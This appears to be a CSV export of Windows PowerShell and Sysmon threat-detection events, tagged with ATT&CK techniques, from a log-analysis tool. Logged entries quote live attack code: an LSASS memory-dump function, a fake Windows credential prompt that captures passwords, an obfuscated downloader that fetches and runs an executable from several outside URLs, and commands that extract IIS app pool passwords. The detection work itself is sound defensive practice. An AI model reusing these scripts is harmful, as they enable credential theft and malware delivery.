message,timestamp,datetime,timestamp_desc,Detection Domain,Severity,Event Description,Event ID,Original Event Log,Computer Name,Channel
powershell script block - Found Suspicious PowerShell commands ,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (System.Management,.invoke,New-Object,New-Object,Remove-Item,del,-ErrorAction , -ErrorAction SilentlyContinue,get-process,Get-Process ,Get-Process,Get-Process lsass,invoke,IO.FileStream,join,MiniDumpWriteDump,Move-Item,new-object,Remove-Item,SilentlyContinue) , check event details ",4104,"
4104
1
3
2
15
0x0
971
Microsoft-Windows-PowerShell/Operational
MSEDGEWIN10
1
1
function Memory($path)
{
$Process = Get-Process lsass
$DumpFilePath = $path
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
#
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
$ProcessId,
$FileStream.SafeFileHandle,
$MiniDumpWithFullMemory,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
"Memdump complete!"
}
}
27f08bda-c330-419f-b83b-eb5c0f699930
C:\Users\Public\lsass_wer_ps.ps1
",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
powershell script block - Found Suspicious PowerShell commands ,1568036117.258414,2019-09-09T17:35:17.258414+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Password,New-Object,New-Object,$env:UserName,add,invoke,new-object,.pass,PromptForCredential,select-object,System.DirectoryServices.AccountManagement) , check event details ",4104,"
4104
1
3
2
15
0x0
1123
Microsoft-Windows-PowerShell/Operational
MSEDGEWIN10
1
1
function Invoke-LoginPrompt{
$cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","")
$username = "$env:username"
$domain = "$env:userdomain"
$full = "$domain" + "\" + "$username"
$password = $cred.GetNetworkCredential().password
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
while($DS.ValidateCredentials("$full","$password") -ne $True){
$cred = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
$username = "$env:username"
$domain = "$env:userdomain"
$full = "$domain" + "\" + "$username"
$password = $cred.GetNetworkCredential().password
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
$DS.ValidateCredentials("$full", "$password") | out-null
}
$output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
$output
R{START_PROCESS}
}
Invoke-LoginPrompt
c7ca7056-b317-4fff-b796-05d8ef896dcd
",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
powershell script block - Found Suspicious PowerShell commands ,1598418568.845521,2020-08-26T09:09:28.845521+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient) , check event details ",4104,"
4104
1
5
2
15
0x0
683
Microsoft-Windows-PowerShell/Operational
DESKTOP-RIPCLIP
1
1
$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')
fdd51159-9602-40cb-839d-c31039ebbc3a
",DESKTOP-RIPCLIP,Microsoft-Windows-PowerShell/Operational
powershell script block - Found Suspicious PowerShell commands ,1568036109.31523,2019-09-09T17:35:09.315230+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (FromBase64String,Base64,New-Object,New-Object,new-object,readtoend,system.io.streamreader) , check event details ",4104,"
4104
1
3
2
15
0x0
1122
Microsoft-Windows-PowerShell/Operational
MSEDGEWIN10
1
1
&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
37f6d110-cfdf-4118-8748-17638e258531
",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
2164892
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2020-10-05 20:43:58.450
00247C92-858E-5F7B-0000-0010E741202B
6636
C:\Windows\System32\cmd.exe
10.0.18362.449 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe
C:\windows\
LAPTOP-JU4M3I0E\bouss
00247C92-8C36-5F75-0000-002034E39103
0x391e334
2
High
SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
00247C92-858E-5F7B-0000-00105241202B
18404
C:\Windows\System32\Taskmgr.exe
C:\windows\system32\taskmgr.exe
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1556808617.955524,2019-05-02T18:50:17.955524+04:00,,Threat,Critical,"User (IEWIN7\IEUser) ran process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7.home ) and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.36.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
10272
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-02 14:48:51.664
365ABB72-0244-5CCB-0000-00109AE70B00
1508
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
IEWIN7\IEUser
tcp
true
false
10.0.2.15
IEWIN7.home
49178
false
151.101.36.133
443
https
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
339891
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-02 16:24:28.637
747F3D96-E8BC-5F26-0000-0010F7C41A00
588
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami.exe
whoami
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-E308-5F26-0000-0020E7030000
0x3e7
0
System
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-E8BA-5F26-0000-001035BE1A00
8104
C:\Windows\System32\cmd.exe
"c:\windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1619129375.284604,2021-04-23T02:09:35.284604+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"
1
5
4
1
0
0x8000000000000000
564605
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-04-22 22:09:35.263
747F3D96-F41F-6081-0000-001078834A00
6644
C:\Windows\System32\svchost.exe
10.0.17763.1 (WinBuild.160101.0800)
Host Process for Windows Services
Microsoft® Windows® Operating System
Microsoft Corporation
svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
C:\Windows\system32\
NT AUTHORITY\LOCAL SERVICE
747F3D96-6E1A-6082-0000-0020E5030000
0x3e5
0
System
SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
00000000-0000-0000-0000-000000000000
624
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1596385468.64099,2020-08-02T20:24:28.640990+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
339890
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-02 16:24:26.803
747F3D96-E8BA-5F26-0000-001035BE1A00
8104
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"c:\windows\system32\cmd.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-E308-5F26-0000-0020E7030000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E309-5F26-0000-0010137B0000
820
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
7
3
4
7
0
0x8000000000000000
29
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 17:01:35.680
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\vaultcli.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Credential Vault Client Library
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
7
3
4
7
0
0x8000000000000000
29
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 17:01:35.680
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\vaultcli.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Credential Vault Client Library
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.731362,2019-05-27T05:29:17.731362+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password ),1,"
1
5
4
1
0
0x8000000000000000
5898
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.691
365ABB72-3D6D-5CEB-0000-00104474FF00
2448
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003.001] Credential dump Thread Open to Lsass,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"
8
2
4
8
0
0x8000000000000000
9066
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 12:43:43.784
365ABB72-4055-5CC8-0000-0010769D0B00
1532
\\VBOXSVR\HTools\voice_mail.msg.exe
365ABB72-3FE0-5CC8-0000-00107E590000
492
C:\Windows\System32\lsass.exe
3656
0x001A0000
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243552
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.397
747F3D96-9F69-5E75-0000-001033922000
6572
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243552
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.397
747F3D96-9F69-5E75-0000-001033922000
6572
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.661261,2019-05-27T05:29:17.661261+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username ),1,"
1
5
4
1
0
0x8000000000000000
5895
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.621
365ABB72-3D6D-5CEB-0000-00108270FF00
1340
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243552
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.397
747F3D96-9F69-5E75-0000-001033922000
6572
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
7
3
4
7
0
0x8000000000000000
27
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 17:01:34.629
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\hid.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Hid User Library
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
7
3
4
7
0
0x8000000000000000
27
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 17:01:34.629
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\hid.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Hid User Library
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.581146,2019-05-27T05:29:17.581146+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1,"
1
5
4
1
0
0x8000000000000000
5892
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:17.420
365ABB72-3D6D-5CEB-0000-0010576BFF00
2928
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1584794166.990686,2020-03-21T16:36:06.990686+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
244341
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 12:36:03.899
747F3D96-0A33-5E76-0000-0010B8813D00
3696
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami.exe
whoami
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-069C-5E76-0000-0020E7030000
0x3e7
0
System
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-08DA-5E76-0000-001054382E00
2632
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task manipulation ,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Medium,"Found User (NT AUTHORITY\SYSTEM) Trying to run taskeng.exe or svchost.exe with Command Line (C:\Windows\system32\svchost.exe) and Parent Image :C:\Users\IEUser\Desktop\info.rar\jjs.exe , Parent CommandLine ("C:\Users\IEUser\Desktop\info.rar\jjs.exe") in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
4863
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-26 04:01:43.557
365ABB72-0FA7-5CEA-0000-001064C60A00
3908
C:\Windows\System32\svchost.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Host Process for Windows Services
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\svchost.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-8DBD-5CEA-0000-0020E7030000
0x3e7
0
System
SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE
365ABB72-0FA6-5CEA-0000-0010FEC30A00
3884
C:\Users\IEUser\Desktop\info.rar\jjs.exe
"C:\Users\IEUser\Desktop\info.rar\jjs.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe ),1,"
1
5
4
1
0
0x8000000000000000
4863
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-26 04:01:43.557
365ABB72-0FA7-5CEA-0000-001064C60A00
3908
C:\Windows\System32\svchost.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Host Process for Windows Services
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\svchost.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-8DBD-5CEA-0000-0020E7030000
0x3e7
0
System
SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE
365ABB72-0FA6-5CEA-0000-0010FEC30A00
3884
C:\Users\IEUser\Desktop\info.rar\jjs.exe
"C:\Users\IEUser\Desktop\info.rar\jjs.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
